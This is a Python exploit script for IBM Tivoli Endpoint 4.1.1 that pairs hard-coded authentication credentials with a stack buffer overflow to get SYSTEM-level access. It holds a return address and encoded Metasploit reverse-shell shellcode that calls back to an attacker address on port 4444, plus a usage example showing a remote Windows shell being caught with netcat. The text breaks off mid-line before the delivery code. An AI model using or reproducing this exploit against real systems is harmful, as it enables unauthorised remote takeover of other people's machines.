#!/usr/bin/python # tiv-sys.py # IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit # Jeremy Brown [0xjbrown41-gmail-com] # June 2011 # # Discovered by: Brian Adeloye of Tenable Network Security # # This exploit makes use of two vulnerabilities: # # 1) Base64 authentication credentials hard-coded in lcfd.exe # 2) Stack-based buffer overflow when parsing HTTP variable values # # Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3 # # $ python tiv-sys.py 192.168.0.188 # ..... # $ nc -v -l 4444 # Connection from 192.168.0.188 port 4444 [tcp/*] accepted # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Tivoli\lcf\dat\1> # # References: # # http://www.zerodayinitiative.com/advisories/ZDI-11-169/ # https://www-304.ibm.com/support/docview.wss?uid=swg21499146 # import sys import struct import socket import httplib import urllib port=9495 ret=0x7C96BF33 # jmp esp @ user32.dll junk="B"*256 # windows/shell_reverse_tcp - 333 bytes # http://www.metasploit.com # Encoder: x86/countdown # LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5, # EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript= payload=( "\x2b\xc9\x66\xb9\x39\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30" "\x4c\x0e\x07\xe2\xfa\xfd\xea\x8a\x04\x05\x06\x67\x81\xec" "\x3b\xd9\x68\x86\x5c\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65" "\x30\x16\xad\x51\x3a\x2c\xe1\x2e\xe0\x8d\x1e\x42\x58\x27" "\x0a\x07\xe9\xe6\x27\x2a\xeb\xcf\xde\x7d\x67\xba\x60\x23" "\xbf\x77\x0a\x36\xe8\xb2\x7a\x43\xb9\xfd\x4a\x75\x41\x91" "\x12\xc8\x0c\x5d\xcd\x1f\x68\x48\x99\xa8\x70\x04\xc5\x7b" "\xdb\x50\x84\x62\xab\x64\x96\xfb\x99\x96\x57\x5a\x9b\x65" "\xbe\x2a\x94\x62\x1f\x9b\x5f\x18\x42\x12\x8a\x31\xe1\x33" "\x48\x6c\xbd\x09\xfb\x7d\x39\xf8\x2c\x69\x77\xa4\xf3\x7d" "\xf1\x7a\xac\xf4\x3a\x5b\xa4\xda\xd9\xe2\xdd\xdf\xd7\x78" "\x68\xd1\xd5\xd1\x07\x9f\x65\x09\xcd\xf9\xa1\xa1\x94\x95" "\xfe\xe0\xeb\xab\xc5\xcf\xf4\xd1\xe9\xb9\xa7\x5e\x77\x1b" "\x34\xa4\xa6\xa7\x81\x6d\xfe\xfb\xc4\x84\x2e\xc4\xb0\x4e" "\x67\xe3\xe4\xe5\xe6\xf7\xe8\xf9\xea\xd3\x56\xb2\x61\x5f" "\x3f\x14\x4b\x04\xac\x05\x6e\xc7\x0e\xa1\xc8\xcb\xdd\x91" "\x47\x29\xba\xc1\x84\x84\xbc\x4c\x73\xa3\xb9\x26\x0f\xb3" "\xbf\xb0\xba\xdf\x69\x02\xb5\xb4\xb3\xd4\x10\x8d\xfa\xb0" "\xbc\x09\x11\x8b\x29\xab\xd4\xcd\xf3\xf2\x79\xb1\xd2\xe7" "\x3e\xf9\xbe\xaf\xac\xab\xa8\xa9\x46\x57\x4c\x55\x52\x56" "\x50\x6f\x71\xc5\x35\x8d\xf3\xd8\x87\xef\x5e\x47\x54\xec" "\x24\x7d\x1e\x90\x05\x79\xe5\xce\xa7\xfd\x03\x35\x2a\x49" "\x84\xb6\x99\xb8\xd9\xf2\x14\x2f\x56\x21\xac\xd6\xce\x5a" "\x35\x8a\x75\x20\x46\x5a\x5c\x37\x6b\xc6\xef") if len(sys.argv)<2: print "Usage: "+sys.argv[0]+" [port]" sys.exit(0) target=sys.argv[1] if len(sys.argv)==3: port=int(sys.argv[2]) retaddr=struct.pack("